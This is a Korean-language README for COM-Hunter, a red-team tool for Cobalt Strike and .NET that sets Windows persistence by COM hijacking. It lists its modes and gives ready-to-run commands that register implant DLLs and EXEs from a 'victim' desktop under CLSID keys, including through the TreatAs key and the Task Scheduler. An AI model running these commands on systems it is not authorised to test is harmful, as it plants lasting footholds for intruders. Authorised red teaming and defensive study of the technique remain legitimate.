
Windows COM 하이재킹 지속성 도구: 검색, 클래식, Task Scheduler, TreatAs 모드 지원. .NET 실행 파일 및 레드 팀 작전용 Cobalt Strike BOF 형태로 사용 가능.
COM 하이재킹 VOODOO

COM-Hunter는 COM 하이재킹 지속성 도구입니다.
.NET 버전과 Cobalt Strike와 완벽히 호환되는 BOF 변형으로 제공됩니다.
다음 목록은 사용 가능한 모드를 설명합니다:
LocalServer32, InprocServer32 및 레지스트리 항목을 기반으로 CLSID를 검색합니다.LocalServer32 또는 InprocServer32를 사용하여 클래식 COM 하이재킹 지속성을 수행합니다.LocalServer32 또는 InprocServer32를 사용하여 작업 스케줄러를 통해 자동으로 COM 하이재킹 지속성을 설정합니다.TreatAs 레지스트리 키와 가짜(전달 가능) CLSID를 사용하여 LocalServer32 또는 InprocServer32를 통해 COM 하이재킹 지속성을 수행합니다.LocalServer32, InprocServer32 및 관련 레지스트리 항목에 의존하는 지속성 메커니즘을 제거합니다.ℹ️ 이 도구는 선정되어 Cobalt Strike Community Kit의 일부로 자랑스럽게 포함되었습니다.
버그를 발견하시면 주저하지 말고 보고해 주세요. 귀하의 피드백은 이 프로젝트의 품질을 향상시키는 데 중요합니다!
이 프로젝트의 저자와 기여자는 도구의 불법 사용에 대해 책임을 지지 않습니다. 이 도구는 교육 목적으로만 제공됩니다. 사용자는 합법적인 사용을 보장할 책임이 있습니다.
이 프로젝트는 @nickvourd와 @S1ckB0y1337에 의해 ❤️로 제작되었습니다.
베타 테스트 단계에서 귀중한 도움을 주신 친구 Marios Gyftos 님께 특별히 감사드립니다.
@zeropointsecltd의 RTO 과정에서 영감을 받았습니다.
BOF 구현은 Lefteris Panos와 그의 멋진 프로젝트 RegPersist에서 영감을 받았습니다.
base.c 및 bofdefs.h 파일은 TrustedSec의 CS-Situational-Awareness-BOF 프로젝트에서 직접 가져온 것입니다.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ HKLM 및 HKCU에서 DLL 및 EXE 구현 검색:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ HKLM 및 HKCU에서 EXE 구현 검색:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ HKLM에서 고급 EXE 구현 검색:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ HKCU에서 EXE 및 DLL 구현 검색:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ DLL 구현을 사용한 클래식 지속성 수행:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ EXE 구현을 사용한 클래식 지속성 수행:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ DLL 구현을 사용한 작업 스케줄러를 통한 지속성 수행:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ TreatAs 레지스트리 키와 가짜 (전달 가능) CLSID를 사용하여 DLL 구현 지속성 수행:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ HKCU에서 DLL 구현 지속성 제거:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ MinGW-w64 도구 체인 (x86_64-w64-mingw32-gcc 및 i686-w64-mingw32-gcc) 필요
ℹ️ 두 아키텍처에 대한 BOF 객체 컴파일:
./make_all.sh
다음 작업을 수행합니다:
com_hunter_* 디렉토리를 생성합니다.com_hunter_*.x64.o 및 com_hunter_*.x86.o를 컴파일합니다.com_hunter_*/ 디렉토리로 이동합니다.ℹ️ BOF 모듈을 컴파일한 후 com_hunter_bof.cna를 Cobalt Strike에 로드하십시오.
ℹ️ 빌드 아티팩트를 정리하려면 각 src 디렉토리로 이동하여 다음을 실행하십시오:
make clean